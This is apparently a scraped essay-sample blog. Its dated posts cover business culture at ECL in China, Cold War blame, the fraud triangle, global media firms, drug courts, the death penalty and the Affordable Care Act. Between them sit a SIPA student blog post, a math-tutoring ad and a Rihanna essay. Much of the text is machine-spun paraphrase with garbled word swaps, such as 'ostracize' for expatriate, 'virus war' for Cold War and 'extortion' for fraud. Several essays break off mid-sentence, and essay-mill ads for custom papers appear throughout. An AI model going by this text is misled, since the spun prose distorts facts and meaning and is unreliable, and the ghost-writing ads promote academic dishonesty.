Tuesday, August 25, 2020
Establishing an ECL culture in China
Setting up an ECL culture in China Electronic Communications Ltd. (ECL) had chosen to begin business in China and to shape a relationship of normal success with Chinese individuals. The organization realized that there was significant advancement to be made, yet there were additionally dangers and difficulties. One of these was the administration of social contrasts. An issue the administration was whether it ought to adjust ECLs the board practice to the Chinese culture or to set up ECLs worldwide administration arrangements in China. Effective social arrangement is a significant component for worldwide associations. Electronic Communications Ltd (ECL), in the same way as other different organizations entering remote markets, is confronted with how to satisfactorily fuse their corporate culture with the Chinese national culture. Situational examination Social issues were an essential issue to survive and the must significant in light of the fact that it will make the day by day activities condition and it is a basic achievement factor for worldwide associations. Electronic Communications Ltd (ECL), in the same way as other different organizations entering remote markets, is confronted with this circumstance. ECL the board must decide whether it is increasingly judicious to adjust to the Chinese culture or to apply their western-driven administration practices to ECL China. ECLs the executives must investigate in the event that they ought to adjust or absorb the way of life, they expected to find that they have to build up a dependable administration intend to draw in, create and hold pioneers inside the organization. One of the key issues for ECL is figuring out how to viably coordinate chiefs from an alternate culture. As indicated by Lewiki individuals from various societies seem to haggle in an unexpected way. Consequently social relations are additionally critical to be built up. Lewiki specifies that moreover of individuals carrying on in an unexpected way, individuals structure various societies may likewise decipher the crucial procedures of arrangements in an unexpected way. This specific issue came up when ostracize administrators gave input to Chinese representatives who considered the to be as a pundit to their way of life. Maybe ECL the board should concentrate on making errands that will add to building associations with ECL China partners. It is realized that that overseeing individual connections is fundamental for compromise. Lewiki makes reference to that as per Phatak and Habib the relations created among the chief arranging parties before the real exchanges will likewise import antly affect the arrangement procedure and result. An individual connection was seen by the Chinese as it could advance a progressively open flank and correspondence among chiefs and their subordinates and associates. The business style introduced inside ECL is shown as ostracize chiefs anticipate that partners should be increasingly proactive. The powerful direction inside ECL China is by all accounts repudiated by the Chinese staff style to discover alternate ways to take care of issues. ECL the executives has made frameworks to foresee the correct strides to taking care of issues to a given circumstance. Notwithstanding, numerous Chinese staff thought the frameworks turned out badly and deferred the dynamic procedure. This logical inconsistency shows that in certain cases Chinese staff did in truth need a chance to be proactive. ECL ought to be make a progressively adaptable illuminating structure that urges Chinese staff to be increasingly proactive without overlooking the issues which can ascend during compromise. Additionally ECL the executives asserts that the Chinese staff came up short on the normal cooperation capacity. This issue was ascribed by certain exiles to the instruction framework in China, since e the framework supports an increasingly independent culture. The face issue in the Chinese society was a blend of poise, sense of pride, eminence and social remaining, as saw by others, a case of face is the point at which an administrator condemn his worker could make the individual lose face particularly in from of others. This alleged losing, face is negative to a working relationship in specific societies. Anyway we can presume that ECL has a solid social adjustment with its representatives. ECL had an effective blend of preparing and frameworks to shape the specialized abilities in the Chinese working environment. There were question regarding the substitution of the ostracizes could be finished on schedule and the Chinese workers were allowed the chance to get advanced inside the organization the senior administration positions were as yet ruled by the exiles. This spoke to another test for ECL that the exiles didn't have the full regard from their staff. Chinese staff experienced issues tolerating that many ostracize chiefs don't have a similar degree of specialized ability that is anticipated from the staff. Further, exiles were regularly seen as not completely dedicated to China and would consign dynamic duty to the home office. This would frequently cause a postponement in profitability. In any case, China has an exceptionally profitable and the instructing program that was created to match Chinese staff with experienced ostracizes was actualized to make a conventi onal component to move information and social data. This brought down the degree of enmity developing towards ECL the executives; it was a superior choice for ECL to elevate exile administrators to China with a significant level of specialized experience who are capable of settling on choices in a short measure of time. An extra test that ECL had was pulling in and keeping neighborhood ability. ECL needed to supplant ostracizes in a brief period time however they are making some troublesome memories recruiting skilled Chinese supervisors. The interest for able faculty was developing and progressively gifted work force were required. A basic issue experienced was the displacement blocking achievement is that numerous skilled potential recruits leave the nation. Those that remain get attractive pay bundles from Chinese claimed firms. A ton of decidedly ready work force were showing signs of improvement offers; ECL additionally needs to go after the rest of the people among different firms that are starting to enter the Chinese market. ECL must recall when searching out ability that regard for older folks assumes a huge job in high force direction nations and youthful chiefs may not get the regard or bolster that they should be powerful. An extra issue was the opposition included by China entering the World Trade Organization. This made a great deal of financial specialists China and begin contributing makes a situation of exceptional rivalry. Maybe, ECL could utilize current representatives to enlist more youthful relatives that can be prepared inside the nation. G ECL must absorb their administration rehearses into Chinese culture. Notwithstanding how hard ECL attempts to instill representatives into the ECL culture, their future ability pool will be produced from the Chinese culture. Consequently is significant for the administration to decide how the social issues might be looked inside ECL. The Chinese work power will be a key factor to ECL achievement. The organization needs to get progressively associated with to how to deal with an immediate exchange and totally adjust to the Chinese culture so as to win their trust regard and be fruitful. Another answer for the companys enlisting exertion is enlist relatives and husband to be them into the ECL culture. Lastly, the ECL can proceed with the preparation from ECL University which will exhibit the ECL culture while acquainting it to ECL China. Rundown of Issues The Chinese culture shows a critical level of community The Chinese societies have bunch situated vision. Ostracizes neglected to build up the relations that are requirements for making an amicable and deferential workplace that would permit the social coordination. The move to be made by ECL is that administration should concentrate on making errands that will add to building associations with ECL China. Ostracize administrators anticipate that partners should be progressively proactive-ECL ought to receive an increasingly adaptable critical thinking structure that urges Chinese staff to be progressively proactive while considering the issues of the compromise procedure. Exile supervisors need results and Chinese staff needs to manufacture connections to get to the outcomes. Chinese staff needs to build up a trust based relationship preceding executing an agreement while the US approach is to settle subtleties and explain. ECL supervisor ought to recognize that the Chinese hard working attitudes corresponds straightforwardly to the Chinese national culture and accordingly should be grasped inside ECL rehearses. Ostracize administrators gave input to Chinese workers who saw the input to be an immediate analysis. The board need to arrangement and customary gatherings and support the discourse. Exiles didn't get the full regard from their staff. For the Chinese staff was hard tolerating that ostracizes on the grounds that they were seen as not completely dedicated to China since they would consign choice duty the organization and that they didn't have a similar degree of aptitude. The training program was created to combine Chinese staff with experienced exiles was executed to make a proper component to move information and culture. An answer could to elevate exile chiefs to the China with a significant level of specialized experience who are happy with settling on basic choices in a short measure of time. ECL is experiencing difficulty drawing in and making sure about neighborhood ability. The issues blocking achievement are that numerous gifted potential acquisitions leave the nation, the Chinese possessed firms offer great pay bundles and all the more contending firms are starting to enter the Chinese market. Proceed with the preparation from ECL University which will exhibit the ECL culture while acculturating it to ECL China and is a framework that whenever oversaw appropriately it will work and will give the ideal outcomes. End To close, ECL must absorb their administration rehearses into Chinese culture. Notwithstanding how hard ECL attempts to includes workers into
Saturday, August 22, 2020
Which former ally, the U.S. or the U.S.S.R., was most at fault for the Essay
Which previous partner, the U.S. or on the other hand the U.S.S.R., was most to blame for the Cold War - Essay Example The most influenced zones were the European nations albeit later the war reached out to Asia, Middle East and Third World nations as the two countries battled for predominance. The war was described by weapons contest and space race with an approaching threat of an atomic war emitting. In any case, the inquiry that requirements noting is; who was liable for the war? Conventionalists accuse the U.S.S.R; the revisionists accuse the U.S while the post-revisionists accept both were to be faulted. This paper will contend that the U.S.S.R was exclusively to fault for the beginning of the virus war because of its expansionist thought processes and the need to spread socialism to the entire world. In spite of the fact that the US and U.S.S.R were the two noninterventionists (stayed impartial) in the two universal wars, unmistakably the two were common opponents. The US was a solid supporter of the industrialist framework and trusted that all countries would grasp popular government while the U.S.S.R was a solid pundit of the entrepreneur framework and a backer of socialism. The Soviet needed to change over the world into socialism and nullify free enterprise which was seen as exploitative. Moreover, the endeavor by the US to help hostile to socialist Russian powers in the 1918-1919 unrest was not overlooked. In any case, when German attacked Soviet Union in 1941 a coalition was shaped between the two forces whereby the Soviet Union was to help US against the Japanese after finish of the Nazi-Soviet war. As indicated by Mooney, â€Å"Despite these shared oppositions, President Roosevelt stretched out Lend-Lease help to the Soviets in November 1941 and started the wartime organization between the U.S.S.R. what's more, the U.S that suffered until the war’s fruitful conclusion†(165). Stalin was not veritable in his dealings as indicated by William Bullitt a consultant to the president. The principal signs came when Soviet demanded establishing a temporary go vernment in Poland alluded as the Lublin Committee and rejected the Poland government in a state of banishment which was working in London. The Soviets were likewise advantaged by the Moscow understanding whereby Churchill and Stalin consented to equation for division of post-war South Eastern Europe circles (75% for Britain and 25% for U.S.S.R). This empowered U.S.S.R to overwhelm the vast majority of Eastern Europe and advance its motivation. Another gathering for Churchill, Roosevelt and Stalin was held in Yalta in 1945 whereby they consented to frame a global harmony association and re-orchestrate post-war guide of Europe. In that capacity, the United Nations (UN) and the UN Security Council were framed. Be that as it may, the Soviet Union was against this Security Council as it wouldn't recognize the socialist legislature of China. As indicated by the Yalta understanding, each force was to control its ‘zone of occupation’ after the war in Germany however Berlin Cit y was to be separated among the four countries. The Americans censured the understanding and accused Roosevelt and Churchill for surrendering Eastern Europe to the Soviets. Notwithstanding, Robert Dalleck of Boston University expresses that, â€Å"this thought that Roosevelt and Churchill parted with Eastern Europe to the soviets is nonsense.†(60 years after the fact discussing Yalta). The Big three likewise made a Declaration on Liberated Europe which commanded the superpowers with the job of supporting the broke countries to reconstruct themselves and furthermore make fair organizations voluntarily. This implied the countries were allowed to hold races and choose the type of government they wished to establishment and which is receptive to people’s will. The superpowers couldn't meddle with equitable procedures of those countries. Nonetheless, the Soviet Union resisted this standard and proceeded to set up a socialist government in Romania. The Soviet Union was
Fraud Triangle free essay sample
Triangle is a significant device in looking to comprehend why individuals submit extortion. In the assessment of any misrepresentation case as per the Fraud triangle there are three significant components, weight, opportunity and justification. To delineate the significance of these three variables we can inspect an ongoing misrepresentation case I. e. the South Carolina Hospitality Association. For this situation Rachel Duncan was the bookkeeper for South Carolina Hospitality affiliation, she is accused of the misappropriation of assets and tax avoidance, at the end of the day Ms. Duncan is said to have utilized her situation as a bookkeeper to take organization assets for her own advantage on further audit it is asserted that around $500,000 was stolen from the Hospitality Association of South Carolina. While trying to comprehend why Rachel Duncan submitted this extortion we can inspect the case regarding the accompanying three components: Pressure: This factor sees what causes or drives a person to submit misrepresentation. We will compose a custom article test on Misrepresentation Triangle or on the other hand any comparable point explicitly for you Don't WasteYour Time Recruit WRITER Just 13.90/page Albrecht demonstrated that these apparent weights can fall into the accompanying classifications, money related, Vice, Work related or different weights. Anyway comparable to the HASC extortion case the weight that caused Ms. Rachel Duncan to submit misrepresentation was a mix of both Financial Vice pressures. On survey of the case it is accounted for that she stole monies so as to help her betting Problem in this way her bad habit was her voracious betting issue and the monetary weight was the way that she depended on deceitful practices to take the assets from HASC so as to help her betting issue. Opportunity: In the misrepresentation triangle opportunity alludes to the circumstances or climate that exists which makes it simple for a person to submit and hide extortion. Albrecht distinguished the control condition which takes a gander at regions, for example, the board job , Management correspondence, Appropriate recruiting, and control exercises, for example, isolation of obligations, autonomous checks and so forth. For this situation opportunity can be seen by the accompanying: No isolation of obligations Rachel Duncan was the bookkeeper who was exclusively responsible for the bookkeeping capacities, in actuality she was answerable for nine financial balances as well as accused of the duties of having the option to compose checks, sign checks and furthermore make stores. By being accountable for every one of these procedures it put her in a solid situation to submit and hide theft of assets from the HASC, had there been an isolation of obligations it could have forestalled the fakes except if there is conspiracy. Absence of autonomous checks to rehash the case Rachel Duncan was viewed as a believed representative accordingly she was given sole obligation over the funds of the association. Anyway they were no free checks by her Boss Mr. Sponseller this could have hindered the extortion, in this manner a mix of elevated levels of trust in Rachel Duncan by her manager joined with inability to autonomously check the exchanges expanded the open door as well as made it extremely simple for her to submit misrepresentation. Employing to rehash this case it was noticed this was not the first run through the HASC experienced extortion in quite a while of theft in certainty before the recruiting of Ms. Duncan a previous worker likewise stole cash, it stands to address whether appropriate record verifications were done preceding employing. In the event that they weren’t, at that point it was the initial step to making an open door for extortion to happen. In this way a mix of each of the three elements combined with the elevated levels of trust gave the ideal environment to Rachel Duncan to submit and hide extortion. Defense This alludes to the reasons that fraudsters may use to legitimize why they have submitted extortion as indicated by Albrecht it might extend from reasons, for example, the accompanying: * The association owes me * I merit more It’s for a decent reason. According to this case Rachel Duncan legitimized by showing that she never intended to damage or misuse anyone’s trust. In this manner in the hour of submitting her false exercises she would have contemplated to herself that nobody would be harmed and it was anything but a maltreatment of anyone’s trust. By continually justifying along these lines, she would have stolen several thousands despite everything accepting that n othing wasn't right. It was additionally detailed that her Boss Mr. Sponseller who put an incredible degree of trust in her in the long run ended it all, so in survey there was a maltreatment of trust and somebody did in reality get injured. In the HASC/Rachel Duncan case every one of the three variables existed for this misrepresentation to occur notwithstanding on the off chance that they had the option to control the open door factor it might have been forestalled.
Friday, August 21, 2020
American Based Media Corporations: Opening the Global Lines of Communic
Unique The world is isolated by numerous obstructions that are today being overwhelmed by innovation. Driving the route in this blast are American based media companies. Prior on numerous organizations saw putting resources into tasks abroad just like a misuse of cash and time. Americans have tended to believe that the world spins around them. This manner of thinking has shielded numerous organizations from venturing into the global markets. The American culture predominance with respect to music, style and lifestyle is fanning out quickly all through the world. Issue Paper American Based Media Corporations: Opening the Global Lines of Communication Over the most recent twenty years innovation has made venture into abroad fields a lot simpler than at any other time. Today American organizations are constantly attempting to exploit the prominence of the US culture in outside business sectors. Media organizations cross patriotism is nothing unexpected considering the way that they have consistently been working on the front line. The media has a lot of power over what individuals see, hear and read every day. Innovation has profited a lot from media organizations uncovering new creations and different headways for people in general to see. Media organizations are likewise answerable for the spread of the American mainstream society, which has charmed itself to numerous in various nations. The are a few media organizations profiting by the American mainstream society blast, however the focal point of this paper will be put on three explicit kinds of media companies. The Associated Press, AT&T and YAR Communications bargain in very surprising zones of media however they all make them thing in like manner, they have strongly looked for after the remote market. The Associated Press In 18... ...So as to stay gainful in such serious market an organization must give an item or administration that ranges the worldwide in advance. The immense media field is ever changing as imaginative youthful personalities keep on finding better approaches to make achievement an unavoidable certainty. Basically the open will have the last say so in which business will do or die in the media worldwide commercial center. The intense choices are made in the city and not in the meeting room. Throughout the years the boulevards have required a progressively differentiated part of the media. The organizations referenced above are pioneers in this individual administrations they give and will keep on assuming a significant job in worldwide media. Works Cited The Associated Press. Website. http://www.ap.org/commemoration/nhistory/past50.html. AT&T Corp. Website. http://www.att.com/att/. YAR Communications. Website. http://www.yar.com/en/.
Thursday, August 6, 2020
Throwback Thursday to a Seeples Winter Break COLUMBIA UNIVERSITY - SIPA Admissions Blog
Throwback Thursday to a Seeple’s Winter Break COLUMBIA UNIVERSITY - SIPA Admissions Blog [From January 2016] This winter break held special significance to me, since it is the last while at SIPA â€" I graduate in May. It was also poignant as perhaps the last winter break when I feel like a student and a young person, with future “winter breaks†likely spent as an adult, likely wherever my career will send me, and with other potential added personal responsibilities. True to myself, I made sure to leave time for “work†and “play†(no “break†has ever been completely a break for me â€" I feel unproductive and quickly get frustrated if I sit idly by for too long, even in the most magnificent of sceneries), but uncharacteristically, this time, I “played†first and “worked†later. My significant other surprised me with a wonderful Christmas escapade to Quebec City (see main photo), where we enjoyed an enchanted few days at Château Frontenac (we have a thing for castles â€" last time we stayed in one, it was in Tuscany’s beautiful Castello di Montegufoni) and took our time exploring the charming bistros hidden all about Vieux Quebec (I highly recommend “Bistro Sous-Le-Fortâ€, almost at the foot of the Funiculaire), as well as holiday markets and other attractions. I relished in the opportunity to converse in French on non-professional matters (since I get plenty of “professional talk†in my work at the UN), and also enjoyed knowing that, while in a very different world, I was only a few hours away from my beloved City. I first discovered Quebec in 2008, attending the World Youth Congress â€" it was my first stop on this continent, and I made my way to the US afterwards, to start college. It was therefore a nostalgic, almost full-circle return to the b eginning of the 8 years I have now spent in the US, and marking the beginning of a soon-to-unfold next chapter in my life, where I expect my career to take me outside of the US. [Photo courtesy of Adriana Popa | Vieux Quebec] [Photo courtesy of Adriana Popa | Me with toffee bears in the toffee shop in Quebec] In January, it was time for “work,†and I flew to Kansas to work in the presidential archives in Abilene with a group of fellow Columbia students as part of my European Institute research fellowship. My work on Cold War diplomacy and Radio Free Europe, while extremely rewarding, was also tiresome, and the very limited healthy options for food intensified the feeling that we missed New York. Kansas was, overall, an interesting experience, both academically, and socially, and we appreciated the generous opportunity awarded through this fellowship, one of Columbia’s many exciting programs. We will be going to Budapest next, and then to Stanford, through the same fellowship, so the next few months (before and right after graduation) are bound to be stimulating! [Photo courtesy of Adriana Popa | Hard at work in the archives] [Photo courtesy of Adriana Popa | European Institute fellows trying on cowboy hats] [Photo courtesy of Adriana Popa | European Institute fellows with Ikes statue on the grounds of the archives]
Tuesday, June 30, 2020
Find the Best Math Tutoring Program for You
When you want to sharpen your math skills, getting a math tutor can set you on the path to achieving that goal. Perhaps you’re encountering some challenges in your AP math course at school and want a tutor to help you address those issues. Or maybe you’re studying for the math section on the SAT or preparing to take the AP math test and could use some extra guidance. Whatever your reasons, hiring a math tutor can make all the difference in your performance. Take a look at some of the qualities shared by the best math tutoring programs available today and you’ll see why it’s a good idea to work with a tutor yourself: Experienced Instructors If you want to improve your skills in math, you have to learn from an instructor with both expertise and experience. Your instructor must be familiar with whatever type of math you are focusing on, and they should also know plenty of strategies that will provide you with ways to overcome the challenges you’re having in math. For instance, an experienced instructor can look at the way you solve an algebra problem and then give you suggestions on how to make the problem more manageable. You may find that making one small change in the way you solve an algebra problem can have a big effect on your level of accuracy. The best math tutors use their experience to benefit you. Our instructors have over-the-top qualifications when it comes to helping students. For example, our SAT instructors scored in the 99th percentile on the exam. We only hire tutors who are genuine experts in the subject they are teaching. Helpful Study Resources Another quality possessed by effective tutoring programs is a supply of helpful study materials and resources. Your tutor should have teaching aids and practice exercises that contribute to your understanding of a topic or skill. In addition, the study materials should suit your learning style. For instance, if you are a visual learner, then your tutor should include graphics, colorful charts, and diagrams in the session. If you don’t know your learning style, your tutor can help you to determine what it is. Tutors in the best math tutoring programs know how to conduct sessions that make the most efficient use of your time and effort. A Selection of Tutoring Options The best tutoring program for you is one that fits neatly into your weekly schedule. At Veritas Prep, we tutor students online and in person. Some students like to sit down face to face in the same room with their tutor, while others prefer to choose their own environment and work with a tutor via the Internet. The choice is up to you. We know that students like you are busy with classes, family activities, clubs, and other obligations. That’s why we make it easy for you to get the help you need in math while maintaining your typical schedule. Flexible Tutoring Sessions Undoubtedly, flexibility is one of the main qualities of the best math tutoring programs. You may sit down for one tutoring session with a list of questions about a lecture given by your math teacher at school. Your tutor can clarity some of the terms and concepts outlined by your teacher so you better understand the material. By the time the session is complete, you should have satisfactory answers to all of your questions. During your next session, you might show your tutor a homework assignment and ask for help on some of the most puzzling problems. Your tutor can partner with you to figure out how to approach each of the problems in an effective way. Flexible tutoring allows you to get the specific assistance you need at the time you need it. If you want to find the best math tutor, then look no further than Veritas Prep. We have a team of experienced instructors and a proven program that gives you the help you need with any type of mathematics. We invite you to look at our FAQ page to find quick answers regarding our services. You’ll see even more information on how we find and hire the best math tutors in the business! Contact Veritas Prep today and get started with our first-rate math tutoring program.
Saturday, May 23, 2020
Rihanna Is Not Someone Who Goes Unnoticed ( Wiki )
In 2005 we were introduced to the Barbarian singer, Robyn Rihanna Fenty, or otherwise known as Rihanna, with her smash hit single â€Å"Pon de Replay†(wiki). Who knew that one song would create such an impact that eleven years later, Riri is still making the people want more. With eight Grammy Awards, twelve American Music Awards, twelve Billboard Music Awards, two BRIT Awards, and the inaugural Icon Award at the American Music Awards of 2013 later, Rihanna is not someone who goes unnoticed (wiki). Rihanna is a musical icon who shows her sexuality through her music. She’s known for her unique look and sound and focuses on getting one thing: making more money. She represents feminism, race, and challenges the gender binary. Rihanna released her eighth studio album, Anti in 2016 and its lead single â€Å"Work†featuring Drake, reached number-one on the Billboard200 and Hot 100 (wiki). This dynamic duo is constantly linked together because of their history where it could be difficult for them to be seen as separate artists. Rihanna’s music video for â€Å"Work†is not only an artistic representation of her music but also a powerful political and cultural message (Xia, Kay). The music video gained over 30+ million views in less than 24 hours (ADAM@JRT). The song is about working hard for your money no matter what is going on in one s life, while also showing Rihanna s softer side as a vulnerable woman in a relationship. Showing that it’s okay for a women to be hurt, but also showing that it
Tuesday, May 19, 2020
Drug Court vs. Incarceration - 2165 Words
Rebeca Manns ENGL 112 Argumentative Paper September 2, 2012 Drug Court vs. Incarceration Drug addiction has increased drastically across America in the last fifty years. Non-violent drug offenders fill our jails and prisons. Taxpayer dollars are put into a prison system that is proving to be counter-productive. Recidivism rates are high. Drug Court is an alternative to incarceration that offers rehabilitation to criminal offenders. In drug court, the traditional functions of the U.S. justice system are profoundly altered. The judge is the leader of a treatment team. The judge makes all final decisions and holds a range of discretion unprecedented in the courtroom, including the type of treatment mandated and how to address†¦show more content†¦Noble County started a drug court program in December 2006. This program has allowed an effective sentencing alternative to the courts of Noble County. Honorable Judge Michael Kramer has presided over the program since its inception. Judge Kramer states that the mission of his drug court progr am is to â€Å"try to help people get clean while avoiding criminal behavior†. He also reports that more than 72 percent of those who are accepted into Noble County Drug Court Program are able to successfully complete all requirements dictated by the court in order to graduate from the program. Defendants who complete the drug court program and remain arrest-free for six months following their graduation, have all charges dropped and their arrest records are expunged. Judge Kramer explained the importance of recent ruling by the Indiana Supreme Court which clarifies the rules of judicial conduct related to drug court programs. This ruling outlines the regulations which help keep each member of the judicial team separate, so that no one has the appearance of being influenced or biased (Kramer). The United States Supreme Court has also made recent changes regarding judicial conduct so that each of the judicial members involved in the drug court system are able to work together, in the best interest of the offender (National Institute of Justice, para8). The taxpayer’s return on moneyShow MoreRelatedResponse Paper to Michelle Alexanders The New Jim Crow: Mass Incarceration in the Age of Colorblindness743 Words  | 3 PagesCrow: Mass Incarceration in the Age of Colorblindness was written by Michelle Alexander to expose the truth of racial injustice in the system of mass incarceration through the comparison of the racial control during the Jim Crow Era. She reveals how race plays an important role in the American Justice System. Alexander argues about the racial bias, particularly towards African-Americans, immanent in the war on drugs as a result of their lack of political power and how the Supreme Court tolerates thisRead MoreThe New Jim Crow : Mass Incarceration On The Age Colorblindness Written By Legal Scholar1197 Words  | 5 Pages Summary The New Jim Crow: Mass Incarceration on the Age Colorblindness written by legal scholar, Michelle Alexander, explores a new caste system that targets black or brown men across improvised communities in the United States. According to Alexander, The New Jim Crow laws were created to hinder the growth of black or brown men by using the criminal justice system to enslave them into a vicious cycle of oppression. The Jim Crow laws that relished our nation’s history so many years earlier hasRead MoreMichelle Alexander s The New Jim Crow1495 Words  | 6 Pagesshown when Michelle talks about the history of the â€Å"War on Drugs†, e.g. Reagan’s policies and Clinton’s â€Å"three strikes your out†policy and how this effects the system today. The third guideline is Internal Consistency. Michelle Alexander keeps all of her information consist. All of the external research she depicts to the readers further confirms the message she is trying to get acros s which is that the American system of mass incarceration is purely a way to continue the discrimination in today’sRead MoreDrug Addiction Treatment Vs. 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But, the death penalty has failed to deter criminals from committing murder. Southern states executes far more convicted murders than any otherRead MoreA Perfect Utopia Of Democracy1185 Words  | 5 Pagesnoticing major concerns in terms of law and policy making. The United States has the highest incarceration rate in the world, with 36 states having more prisoners than the next leading country, Cuba (Vice). One of the reasons why we have such a high incarceration rate can be blamed on the policy of stop and frisk. Although stop and frisk policies are implemented in order to better protect our society from drugs and weapons, the way it has been used by law enforcement violates the fourth amendment becauseRead MorePunishment vs Rehabilitation1661 Words  | 7 PagesPunishment vs. Rehabilitation Helen Olko October 1, 2012 Abstract The expectations that our society has for the criminal justice system is to punish and rehabilitate individuals who commit crime. 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Statistics show that there is racial disparities in many decisions made in the criminal he justice system. One example is the â€Å"driving while black,†shows the potential abuse by law enforcement. According to The New Jim Crow, the Supreme Court has actually granted the police license to discriminate, it is not advertised because they know that the public will not accept this, it is left unsaid. Propositions racial variations have denied ethnic minorities of their most essential social equalityRead MorePrison Overcrowding And The United States994 Words  | 4 PagesPrison Overcrowding In the United States, there’s two types of incarcerations: jail vs prison and federal vs state. The key difference between all prison systems is the size, location, and quantity of inmates and the crime rate in each area. Overpopulation has been an issue for a while mainly because for the safety for the inmates, the Three Strike Law, and also, society feeling that rehabilitation isn’t what they want for convicted felons. In the future, the system of corrections should decrease
Monday, May 11, 2020
A View Into Death Penalty Essay - 1895 Words
A View into Death Penalty Back in the 1600’s, British settlers were just beginning to arrive in North America and were exploring the vast lands. They began constructing permanent settlements such as Plymouth and Jamestown. With them, they brought along many customs from Britain; one of them being the way with which they dealt with prisoners: the death penalty. Britain was one of the biggest influence for the use of death sentence in the United States, though various places in Europe also used it. In the settlements and towns, they dealt with criminals by executing them in various ways, including hanging, drowning, shooting, and burning at stake. Some of the most common reasons that led to a person being executed were treason, murder, theft, religious matters and sexuality. (Part I History of the Death Penalty). Nowadays, death penalty is a theme of controversy, not only in the United States, but also in the rest of the world. Death penalty is highly controversial because it puts into question the cause s of morality, capital costs, ethnicity, constitutionality, discouragement, motives, professionality, and justice. In the United States, approximately twenty eight states currently occupy death penalty. Death penalty, or capital punishment is applied to people who commit first-degree murder, which is defined as killing in a willful and premeditated manner (First Degree Murder Overview). Officially, capital punishment was reinstated around the 1970’s, and there have been legalShow MoreRelatedDifferent View Points on the Death Penalty809 Words  | 3 Pageswill discuss the death penalty and its different points of view. Throughout history since the death penalty first was invented, people have had numerous thoughts on it. Some people are against it and others are for it. Many believe that it is too expensive and the death penalty is an easy way out for the offender. However others believe that it should exist and that it is worth the cost. We will discuss the Criminal Justice System and the affects and efficiency the death penalty has. Further on,Read MoreDeath Penalty: the Christian View Essay2479 Words  | 10 Pagessevere as death penalty. Capital punishment or death penalty is usually imposed on persons who committed heinous crimes and are those that endanger the safety of the society. Some countries and societies implement capital punishment while others do not. There are various reasons for this policy of countries, including the social view on the death penalty and the prevailing religious view in the society among others. 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This is because an answer to the question is the death penalty effectiveRead MoreCapital Punishment Should Be Abolished Essay1293 Words  | 6 Pagespoint of view to argue their case, even though this view can be stretched to fit almost any argument. This paper will explore the use of capital punishment through the view that it is acceptable only in the most severe cases. The death penalty needs to focus on the dignity and the respect of human life; therefore, society needs to fix the existing problems within the legal system. Finally, this paper will explore the views of Kant to help find a soluti on as to the future of the death penalty. AlthoughRead MoreArgumentative Essay On The Death Penalty957 Words  | 4 PagesThe death Penalty is a very controversial topic to many. Some believe that the death penalty should not only be in place but there should be more executions every year. While others believe that the death penalty is going out of style and it is not serving its purpose of deterring crime as it did before. Although there are many claims supporting both sides still over half of Americans are for capital punishment in some way, but what causes someone to be sentenced to death? According to the articleRead MoreThe Debate Over Capital Punishment936 Words  | 4 Pagescapital punishment is in regards to whether the death penalty contradicts the Eighth Amendment. If the death penalty does contradict the Eight Amendment, then the State should not have the power to sentence criminals to death for capital crimes. However, if capital punishment is not against the Eighth Amendment, then the State has the right to sentence criminals to death. In this essay I will first summarize Justice Brennan’s argument on why the death penalty is beyond the power of the State to inflictRead MoreThe Death Penalty : A Multi Level Analysis Of Public Opinion1179 Words  | 5 PagesIn society, the death penalty is used to punish those who had committed certain types of crimes. Over the years, the percentage of US citizens supporting the death penalty has decrease, however Proximally 64%-70% of the population still support it. The majority of the polls created to evaluate the opinion of citizens on the death penalty use simple questions to address the issue. Those questions separate people into those against it and those supporting it. The death penalty opinion is more complexRead MoreCapital Punishment And The Death Penalty Essay1690 Words  | 7 Pagesconvicted person is ordered to death by the court system (Dotson and Carter, 2012, p.1). Capital punishment also known as the death penalty is on e of the most controversial issues in today’s society. Many supporters and opponents of the death penalty debate over whether it is constitutional, whether it is inhumane, and whether it deters crime. Some abolitionists view the death penalty as immoral because it violates an individual’s right to life. Other opponents of the death penalty feel that the state should
Wednesday, May 6, 2020
Background Of Affordable Care Act - 1344 Words
Description of the Issue Background of Affordable Care Act The Patient Protection and Affordable Care Act (PPACA), commonly called Obama care, or the Affordable Care Act (ACA), is a United States federal statute signed into law by President Barack Obama on March 23, 2010. Together with the Health Care and Education Reconciliation Act (an amendment to the ACA signed March 30, 2010) it represents the most significant regulatory overhaul of the country’s healthcare system since the passage of Medicare and Medicaid in 1965. Anywhere from thirty-eight to forty eight million Americans do not have health insurance for a number of reasons. Yet the cost of these uninsured citizens is passed to healthcare providers and ultimately consumers. More than one hundred billion dollars in health care costs annually is imposed on the present system by the uninsured. Most of this cost is manifested in higher health care costs and in some cases even the closure of hospitals. Thus the ACA is intended to prevent the uninsu red from catastrophic medical expenses which not only devastate individual credit ratings, but also lead to bankruptcy and home foreclosures (E J Martin, 2015). The ACA offers more secure and affordable insurance for those who already have coverage, as well as those who have not been able to afford it (Stewart Denisco, 2015) Current Status and Policy The ACA does not interfere with each state lawfully addressing the delineation of the scope of practice for APNs for itself.Show MoreRelatedBackground Of The Affordable Care Act1722 Words  | 7 PagesBackground ACA - Affordable Care Act What is Affordable Care Act? According to Investopedia, the ACA is defined as a law that was sign by Obama in March 2010, in order to expand and cost less for people to have health care protection [1]. Not many people agree to have Affordable Care Act, and that includes people from one of the parties that are known as a Republican. This act helps and provides health insurance of a person from the lower/middle income, however, not many people can qualify to haveRead MoreThe Background Of The Affordable Care Act1502 Words  | 7 PagesAffordable Care Act Background: Healthcare insurance is an important benefit everyone should have, but before the â€Å"Affordable Care Act,†health insurance was too expensive for families to pay for. Those who could afford the high cost would need to be in an excellent health state before any insurance company would accept to be their healthcare coverage provider. Meaning that individuals who already had a preexisting medical condition would be denied by insurance companies, which made it tough toRead MoreThe Affordable Care Act: Obamacare1140 Words  | 5 PagesThe Affordable Care Act, often referred to as the ObamaCare was signed into law on March 23, 2010. It has created a lot of controversy since its debut. The Healthcare reform will affect all Americans. The issue has many Americans believing it is a great thing for our country while others believe it is a terrible idea and then of course there are those who don’t know what to think. By Jan 1, 2014 Americans will be required to purchase a h ealth care policy or will have to pay a penalty. Ready or notRead MoreWhat Would A Republican Win Mean For Health Policy?859 Words  | 4 Pageschange? Would it be a drastic change or a subtle change? Background Summary: The article illustrates that how republican candidate, Donald Trump, wants to change the aspects of health care. As mentioned in the article, Trump wants to make vast decisions on health care and wants to repeal the Affordable Care Act (ACA) (Wilensky, 2016). The Affordable Care Act was created in order to help individuals obtain insurance. The Affordable Care Act was created during Obama’s presidency and is a part of ObamacareRead MoreThe Affordable Care Act (Aca), Also Known As Obamacare,1023 Words  | 5 PagesThe Affordable Care Act (ACA), also known as ObamaCare, is a healthcare reform law that focus on providing more Americans with access to affordable health insurance. â€Å"The ACA is expected to add 32 million people seeking primary and preventive service and treatment†(journalofnursingregulation.com). It was first enacted by President Barack Obama on March 23, 2010. The act has offered a number of people with benefits, set 